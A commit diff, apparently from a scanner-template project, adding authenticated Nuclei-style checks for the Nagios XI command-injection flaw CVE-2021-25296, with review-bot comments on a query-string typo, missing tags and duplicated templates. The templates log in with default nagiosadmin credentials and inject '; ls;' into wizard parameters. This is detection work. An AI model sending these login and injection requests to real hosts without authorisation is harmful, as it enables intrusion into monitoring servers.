Complete template matching conditions with authentication

patch-1
Matthew Dunn 2023-01-28 10:16:06 -05:00
parent b6aeca9092
commit 18a6768469
3 changed files with 100 additions and 10 deletions


@ -14,9 +14,39 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-25296
cwe-id: CWE-78
tags: cve,cve2021,nagiosxi
tags: cve,cve2021,nagiosxi,authenticated
requests:
- method: GET
path:
- "{{BaseUrl}}/nagiosxi/config/monitoringwizard.php?update=1&nextstep=3&wizard=windowswmi&plugin_output_len=9999;"
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
- |
GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3b%20ls%3b HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<input type="hidden" name="plugin_output_len" value="9999; ls;">'
- "<input type='hidden' name='plugin_output_len' value='9999; ls;'>"
extractors:
- type: regex
part: body
name: nsp_token
group: 1
internal: true
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"
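Review bot: The third raw request is missing an `&` between `update=1` and `nsp={{nsp_token}}`, so the query string carries a single `update` parameter with the value `1nsp=<token>`, and neither the update flag nor the session token is sent as intended. The request line should begin `GET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_token}}&nextstep=3&wizard=windowswmi`. The same `update=1nsp=` typo is in the final request of the other two files in this commit. If the wizard rejects a request without a valid `nsp`, the templates would likely stay silent on affected hosts, which a scan operator would read as a clean result.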


@ -17,6 +17,36 @@ info:
tags: cve,cve2021,nagiosxi
requests:
- method: GET
path:
- "{{BaseUrl}}/nagiosxi/config/monitoringwizard.php?update=1&ipaddress=127.0.0.1&nextstep=4&wizard=digitalocean"
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
- |
GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&ip_address=127.0.0.1%3b%20ls%3b&nextstep=4&wizard=digitalocean HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<input type="hidden" name="ip_address" value="127.0.0.1; ls;">'
- "<input type='hidden' name='ip_address' value='127.0.0.1; ls;'>"
extractors:
- type: regex
part: body
name: nsp_token
group: 1
internal: true
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"
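Review bot: The `tags:` line in this file is left at `cve,cve2021,nagiosxi` although the template now logs in before probing; the first file in this commit added `authenticated` for the same change. Suggest `tags: cve,cve2021,nagiosxi,authenticated` here, so that operators who filter on that tag to keep login attempts away from production hosts do not run this template by accident. The third file has the same unchanged tags line.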


@ -17,6 +17,36 @@ info:
tags: cve,cve2021,nagiosxi
requests:
- method: GET
path:
- "{{BaseUrl}}/nagiosxi/config/monitoringwizard.php?update=1&ipaddress=127.0.0.1&nextstep=4&wizard=digitalocean"
- raw:
- |
GET /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /nagiosxi/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
nsp={{nsp_token}}&page=auth&debug=&pageopt=login&username=nagiosadmin&password=nagiosadmin&loginButton=Login
- |
GET /nagiosxi/config/monitoringwizard.php?update=1nsp={{nsp_token}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20ls%3b HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<input type="hidden" name="ip_address" value="127.0.0.1; ls;">'
- "<input type='hidden' name='ip_address' value='127.0.0.1; ls;'>"
extractors:
- type: regex
part: body
name: nsp_token
group: 1
internal: true
regex:
- '<input type="hidden" name="nsp" value="(.*)">'
- "<input type='hidden' name='nsp' value='(.*)'>"
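Review bot: The final request and the matcher in this file are the same as in the previous file apart from `no_ssl_verify=1` and the parameter order: both use `wizard=digitalocean` and both match on the `ip_address` hidden field. If the two templates are meant to cover different issues, one of them is probably pointing at the wrong wizard or parameter, and a single behaviour would be reported under two template IDs; please confirm each against its advisory. The matcher also only checks that the submitted value is echoed into the form, so a comment such as `# matches reflected input only; confirm the finding manually` above `matchers:` would tell triagers what a hit actually proves.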